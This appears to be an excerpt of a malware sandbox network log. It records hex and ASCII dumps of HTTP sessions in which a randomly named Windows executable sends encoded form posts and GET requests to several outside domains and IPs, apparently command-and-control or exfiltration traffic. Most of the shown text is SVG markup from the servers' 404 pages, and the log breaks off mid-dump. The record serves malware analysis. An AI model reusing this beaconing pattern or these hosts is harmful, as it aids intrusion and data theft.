Oct 9, 2024 16:30:48.999337912 CEST	1236	IN	Data Raw: 2e 32 33 35 36 39 33 2c 32 33 2e 34 38 38 33 35 20 30 2e 32 33 35 36 39 33 2c 33 36 2e 35 35 30 37 32 20 2d 31 30 65 2d 37 2c 31 33 2e 30 36 32 33 38 20 2d 30 2e 31 31 37 38 33 33 2c 32 37 2e 34 33 37 39 36 20 2d 30 2e 30 35 38 39 31 2c 34 35 2e Data Ascii: .235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43796 -0.05891,45.3521 0.05892,17.91413 0.29461,39.36153 0.707091,58.80738 0.412482,19.44585 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stro
Oct 9, 2024 16:30:48.999352932 CEST	1236	IN	Data Raw: 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 Data Ascii: 59,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4556" d="m 42.426407,155.38825 c 3.4184
Oct 9, 2024 16:30:48.999375105 CEST	1236	IN	Data Raw: 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c Data Ascii: play:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5" cy="238.08525" cx="119.12262"
Oct 9, 2024 16:30:49.004749060 CEST	1236	IN	Data Raw: 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 Data Ascii: transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606 -8.38477,3.759 1.35199,-3.11016 5.69513,-12.89881 10.5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	50010	162.0.213.94	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:30:50.930421114 CEST	500	OUT	GET /ve3g/?1Dd0AZ=OTcOv8w+bCTLwtzbPVHaVBaVlmgm7BOGOBYyNnUD5x742Zgn72+Avt/ao6tsWGE5AAzMA+xeSHuleySgj3Ruc3Zh0Y3NGXhxV/AZkf+qXDjjwczoUoJ8qIseLUJpArAgGg==&-n1P=0hFdS6 HTTP/1.1 Host: www.oxilo.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Oct 9, 2024 16:30:51.514640093 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 09 Oct 2024 14:30:51 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 16052 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Oct 9, 2024 16:30:51.514666080 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 73 74 6f 70 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 73 74 6f 70 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 Data Ascii: style="stop-color:#000000;stop-opacity:1;" /> </linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="
Oct 9, 2024 16:30:51.514678001 CEST	1236	IN	Data Raw: 2e 33 33 65 2d 34 20 2d 30 2e 37 38 31 39 38 2c 2d 33 2e 36 37 32 33 38 36 20 2d 31 2e 30 37 34 38 33 38 2c 2d 39 2e 37 36 30 36 35 37 20 2d 30 2e 33 36 31 38 35 2c 2d 37 2e 35 36 34 37 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 Data Ascii: .33e-4 -0.78198,-3.672386 -1.074838,-9.760657 -0.36185,-7.564779 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-wi
Oct 9, 2024 16:30:51.514709949 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 78 3d 22 33 35 2e 33 35 35 33 33 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 39 2e 38 39 39 34 39 35 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 Data Ascii: x="35.355339" height="9.8994951" width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;
Oct 9, 2024 16:30:51.514720917 CEST	1236	IN	Data Raw: 2d 32 2e 33 33 33 33 39 2c 39 2e 38 33 32 38 20 2d 32 2e 35 30 30 31 34 39 2c 31 34 2e 33 33 33 34 33 20 2d 30 2e 31 36 36 37 35 39 2c 34 2e 35 30 30 36 32 20 30 2e 33 33 33 31 32 34 2c 38 2e 36 36 36 33 31 20 31 2e 32 34 39 39 32 32 2c 31 35 2e Data Ascii: -2.33339,9.8328 -2.500149,14.33343 -0.166759,4.50062 0.333124,8.66631 1.249922,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.3
Oct 9, 2024 16:30:51.514733076 CEST	1120	IN	Data Raw: 37 2e 37 34 39 37 34 20 34 2e 36 38 32 30 35 2c 31 30 2e 39 31 33 38 34 20 30 2e 37 36 35 34 32 2c 33 2e 31 36 34 31 20 31 2e 34 30 31 32 39 2c 36 2e 35 30 32 34 32 20 31 2e 36 39 37 38 31 2c 38 2e 30 32 34 30 36 20 30 2e 32 39 36 35 31 2c 31 2e Data Ascii: 7.74974 4.68205,10.91384 0.76542,3.1641 1.40129,6.50242 1.69781,8.02406 0.29651,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;str
Oct 9, 2024 16:30:51.514744997 CEST	1236	IN	Data Raw: 20 2d 30 2e 34 31 32 35 35 2c 31 32 2e 37 38 39 33 34 20 2d 31 2e 32 33 37 33 31 2c 33 34 2e 31 31 35 33 36 20 2d 32 2e 31 38 30 31 34 2c 35 33 2e 36 32 30 31 35 20 2d 30 2e 39 34 32 38 32 2c 31 39 2e 35 30 34 37 38 20 2d 32 2e 30 30 33 34 32 39 Data Ascii: -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.064154,54.86032" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opaci
Oct 9, 2024 16:30:51.514755964 CEST	1236	IN	Data Raw: 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 34 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 39 2e 32 35 34 37 38 2c 31 32 34 2e 32 33 32 36 Data Ascii: /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,11.56251 -10.880951,23.12622 -15.899657,33.56368 -5.018706,10.43747 -9.614414,19.74672 -11.912808,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.
Oct 9, 2024 16:30:51.514766932 CEST	1236	IN	Data Raw: 37 30 33 38 2c 30 2e 34 30 33 36 31 20 39 35 2e 30 39 33 30 37 31 2c 30 2e 38 30 37 32 31 20 31 34 32 2e 36 33 38 31 30 31 2c 31 2e 32 31 30 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 Data Ascii: 7038,0.40361 95.093071,0.80721 142.638101,1.2108" style="display:inline;fill:none;stroke:#000000;stroke-width:1.00614154px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4529"
Oct 9, 2024 16:30:51.514779091 CEST	1236	IN	Data Raw: 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 72 79 3d 22 33 2e 38 38 30 35 34 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 72 78 3d 22 33 2e 35 37 37 37 35 30 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 79 3d Data Ascii: 0.038164)" ry="3.880542" rx="3.5777507" cy="164.5713" cx="321.42224" id="path4565" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stro
Oct 9, 2024 16:30:51.519681931 CEST	1236	IN	Data Raw: 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 37 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 Data Ascii: rm="translate(-170.14515,-0.038164)" id="path4578" d="m 314.72098,177.37003 c -0.21488,1.64138 -0.42965,3.28197 0.28484,3.96351 0.71449,0.68155 2.35396,0.39999 3.99418,0.1183" style="fill:none;stroke:#000

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	50011	85.159.66.93	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:30:56.873680115 CEST	792	OUT	POST /mx00/ HTTP/1.1 Host: www.farukugurluakdogan.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.farukugurluakdogan.xyz Content-Length: 207 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.farukugurluakdogan.xyz/mx00/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 6e 67 4e 2b 57 63 41 78 57 46 39 34 65 68 32 4b 64 2b 78 45 53 4b 72 52 4d 38 64 6b 37 49 33 58 42 6d 4c 71 43 73 58 49 70 4a 56 65 57 41 69 2b 53 56 34 48 5a 41 39 2f 6d 71 48 66 4e 34 69 72 67 4c 44 6f 38 59 61 4b 37 30 4d 49 58 2f 32 58 4d 44 4a 36 68 31 44 32 7a 67 65 4b 77 71 5a 68 7a 6d 34 58 68 57 53 42 6b 6d 51 65 50 45 61 37 62 46 6c 2f 45 45 37 62 77 30 4f 32 48 48 6b 63 6b 33 34 52 39 30 79 79 70 38 32 47 6c 4d 78 75 64 49 36 5a 65 64 79 4c 4b 52 54 53 73 4c 48 46 64 62 62 43 53 6c 51 63 6f 31 75 64 6b 39 38 30 44 54 65 62 41 36 75 68 6a 47 77 59 4e 56 50 4c 36 75 73 76 39 4c 38 3d Data Ascii: 1Dd0AZ=ngN+WcAxWF94eh2Kd+xESKrRM8dk7I3XBmLqCsXIpJVeWAi+SV4HZA9/mqHfN4irgLDo8YaK70MIX/2XMDJ6h1D2zgeKwqZhzm4XhWSBkmQePEa7bFl/EE7bw0O2HHkck34R90yyp82GlMxudI6ZedyLKRTSsLHFdbbCSlQco1udk980DTebA6uhjGwYNVPL6usv9L8=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	50012	85.159.66.93	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:30:59.415832996 CEST	812	OUT	POST /mx00/ HTTP/1.1 Host: www.farukugurluakdogan.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.farukugurluakdogan.xyz Content-Length: 227 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.farukugurluakdogan.xyz/mx00/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 6e 67 4e 2b 57 63 41 78 57 46 39 34 65 42 6d 4b 52 39 5a 45 55 71 72 65 52 4d 64 6b 75 59 33 74 42 6d 48 71 43 75 37 59 71 37 68 65 54 51 53 2b 54 55 34 48 61 41 39 2f 74 4b 48 61 4a 34 69 67 67 4c 4f 49 38 61 65 4b 37 30 6f 49 58 2b 47 58 5a 69 4a 6c 67 6c 44 4f 31 67 65 49 6f 4b 5a 68 7a 6d 34 58 68 57 75 72 6b 6d 59 65 4f 30 4b 37 61 6b 6c 38 4e 6b 37 61 35 55 4f 32 44 48 6b 51 6b 33 35 30 39 78 53 63 70 2f 65 47 6c 4a 56 75 64 5a 36 61 56 64 79 42 4f 52 53 74 6c 4b 65 37 64 6f 76 69 66 48 46 55 39 30 4b 43 73 72 52 65 5a 78 57 7a 54 61 43 5a 7a 56 34 76 63 6c 75 69 67 4e 38 66 6a 63 70 6f 4b 65 42 36 5a 56 42 37 53 68 4b 77 59 6a 78 45 36 5a 50 67 Data Ascii: 1Dd0AZ=ngN+WcAxWF94eBmKR9ZEUqreRMdkuY3tBmHqCu7Yq7heTQS+TU4HaA9/tKHaJ4iggLOI8aeK70oIX+GXZiJlglDO1geIoKZhzm4XhWurkmYeO0K7akl8Nk7a5UO2DHkQk3509xScp/eGlJVudZ6aVdyBORStlKe7dovifHFU90KCsrReZxWzTaCZzV4vcluigN8fjcpoKeB6ZVB7ShKwYjxE6ZPg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	50013	85.159.66.93	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:31:01.965507030 CEST	1829	OUT	POST /mx00/ HTTP/1.1 Host: www.farukugurluakdogan.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.farukugurluakdogan.xyz Content-Length: 1243 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.farukugurluakdogan.xyz/mx00/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 6e 67 4e 2b 57 63 41 78 57 46 39 34 65 42 6d 4b 52 39 5a 45 55 71 72 65 52 4d 64 6b 75 59 33 74 42 6d 48 71 43 75 37 59 71 37 35 65 54 42 79 2b 54 33 41 48 62 41 39 2f 78 61 48 62 4a 34 69 48 67 4c 6d 45 38 61 43 77 37 32 41 49 46 4d 4f 58 64 68 52 6c 71 6c 44 4f 33 67 65 4a 77 71 5a 30 7a 6c 52 65 68 58 53 72 6b 6d 59 65 4f 78 4f 37 54 56 6c 38 4c 6b 37 62 77 30 4f 79 48 48 6b 30 6b 30 4a 43 39 78 57 69 6f 4f 2b 47 6c 70 46 75 61 72 53 61 63 64 79 48 43 78 53 31 6c 4b 69 65 64 6f 6a 49 66 47 78 2b 39 33 61 43 76 38 38 70 4f 7a 4f 2b 45 34 4f 6e 67 6e 52 44 43 7a 32 33 2f 62 46 70 69 38 68 4b 44 61 5a 68 61 6b 46 4b 53 44 33 4a 48 47 4a 44 34 5a 71 56 72 38 2b 49 31 68 55 51 4e 33 64 50 35 49 35 4a 41 36 6d 50 43 6f 4d 6b 52 46 68 67 34 6e 59 6e 66 32 52 75 65 4b 46 78 49 35 63 58 73 34 61 34 78 6d 69 30 67 31 70 67 6d 79 53 6e 6b 54 61 4f 66 71 5a 59 42 6f 71 6e 33 37 6b 65 67 79 74 55 79 46 34 44 54 32 55 38 48 7a 7a 2f 6c 42 7a 7a 4b 41 42 2f 52 43 4f 6a 75 48 77 62 41 72 65 [TRUNCATED] Data Ascii: 1Dd0AZ=ngN+WcAxWF94eBmKR9ZEUqreRMdkuY3tBmHqCu7Yq75eTBy+T3AHbA9/xaHbJ4iHgLmE8aCw72AIFMOXdhRlqlDO3geJwqZ0zlRehXSrkmYeOxO7TVl8Lk7bw0OyHHk0k0JC9xWioO+GlpFuarSacdyHCxS1lKiedojIfGx+93aCv88pOzO+E4OngnRDCz23/bFpi8hKDaZhakFKSD3JHGJD4ZqVr8+I1hUQN3dP5I5JA6mPCoMkRFhg4nYnf2RueKFxI5cXs4a4xmi0g1pgmySnkTaOfqZYBoqn37kegytUyF4DT2U8Hzz/lBzzKAB/RCOjuHwbAreUOpLdUptjsr+7ce5zaEuL3M0zLHN7QJiwapYtDZ2mYI8reiB3PVKF3gsMRfrB0qh43k9+inKxtiGaQ9BVnDpBuzbHfAdST/X1qJ0osuXw8EUm1OzLTrIq/qDmG416IDHdTa2W+ksNzvutkYgMTanWRjN2b0e/EoRxYVvaVFpnZb6j4FoJhOqLxb5vnN+nIEM7/9X1dgg6dDiPDlYKkWHng5cxNtpe+WARkexo0P7ZUz2RIwau8MEogpvIrvbQxTeOQQ0N7TdH7jBKShAkJdzfsLfb1ZwSVtfi44tpzGIkzGnK1BPp9WG6/6ETLw1FgncF3CJVFVtaLxD50lzj2BQWxqyCmBLoagSJGBaiSOv9xyxuRce6Dqazs+4+oxZ2qISftQvffix1vJ9QAGL2Ev7kUQC/tz7JMmw4FmYn1fe2unD9EXEkqN6+yJ4EDfr2FKrAHELn65cNHtm+kndsdOv9ojtI6TEwthCm8XqEMBTNQrsGmScSkh0KsXh+UPDQU+BKSx/immG+xwm8x0r4UOWT8XmBmUCO6k3wpeWJaZRyXrW24bJdIbThdvJZ3FZa8FRunePXW7sCKcBZn9L6TiyT78VPVGcdQihRHHKAUvwgiBd4tfzCFRgc2Wgolh2urRQuMu3e5XRkhf+7hkUwqnADI3OQ0klQrWDG0 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	50014	85.159.66.93	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:31:04.512209892 CEST	512	OUT	GET /mx00/?1Dd0AZ=qileVsN1diZFcCO3Qsw4YZf+VstA9OzPNQ7Oa8/FkrUJR0uYa1wUZggpoqScYraC15jy36uBsEEpRc6ILD1+pn39gh+i/JJWwEE6vnOCgWAwHzuRQDxiPAmp6FvDKEZlxA==&-n1P=0hFdS6 HTTP/1.1 Host: www.farukugurluakdogan.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Oct 9, 2024 16:31:05.186007977 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Wed, 09 Oct 2024 14:31:05 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-10-09T14:31:10.0836950Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	50015	217.160.0.147	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:31:10.252571106 CEST	759	OUT	POST /ds60/ HTTP/1.1 Host: www.cy-nrg.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.cy-nrg.info Content-Length: 207 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.cy-nrg.info/ds60/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 41 72 46 49 41 62 72 64 61 47 50 54 57 64 36 53 77 35 68 7a 75 77 49 75 69 4e 59 38 6b 4b 7a 4d 77 42 50 71 54 50 5a 32 4f 62 2b 35 72 52 59 31 5a 32 74 4a 58 58 73 38 62 71 6b 42 36 53 32 7a 50 6a 58 63 6a 33 77 4c 62 72 79 46 55 2b 4c 52 53 44 6c 50 47 79 6a 54 75 2f 59 32 71 77 71 6e 70 31 49 41 47 56 32 77 73 7a 41 6c 35 76 44 6d 51 4d 6f 6b 2b 34 75 77 37 2f 4c 76 6a 45 30 6f 35 2b 39 55 39 42 75 30 33 37 47 61 78 58 62 62 47 6d 52 51 35 59 39 39 31 4e 31 67 63 43 44 7a 59 42 56 6f 48 68 72 63 34 57 6f 2b 30 68 6a 51 32 51 65 6a 69 69 46 54 62 53 2b 48 35 69 44 71 48 30 7a 72 54 51 41 3d Data Ascii: 1Dd0AZ=ArFIAbrdaGPTWd6Sw5hzuwIuiNY8kKzMwBPqTPZ2Ob+5rRY1Z2tJXXs8bqkB6S2zPjXcj3wLbryFU+LRSDlPGyjTu/Y2qwqnp1IAGV2wszAl5vDmQMok+4uw7/LvjE0o5+9U9Bu037GaxXbbGmRQ5Y991N1gcCDzYBVoHhrc4Wo+0hjQ2QejiiFTbS+H5iDqH0zrTQA=
Oct 9, 2024 16:31:10.897483110 CEST	558	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Wed, 09 Oct 2024 14:31:10 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a [TRUNCATED] Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,\|hEKZ{XtAo[Y0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	50016	217.160.0.147	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:31:12.796569109 CEST	779	OUT	POST /ds60/ HTTP/1.1 Host: www.cy-nrg.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.cy-nrg.info Content-Length: 227 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.cy-nrg.info/ds60/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 41 72 46 49 41 62 72 64 61 47 50 54 51 38 4b 53 38 36 4a 7a 73 51 49 76 6e 4e 59 38 79 36 7a 49 77 42 44 71 54 4b 34 75 4f 74 6d 35 72 78 6f 31 49 44 52 4a 55 58 73 38 55 4b 6b 49 33 79 32 73 50 6a 61 6a 6a 32 63 4c 62 72 6d 46 55 38 54 52 54 79 6c 49 48 69 6a 52 6a 66 59 4f 6e 51 71 6e 70 31 49 41 47 56 69 4f 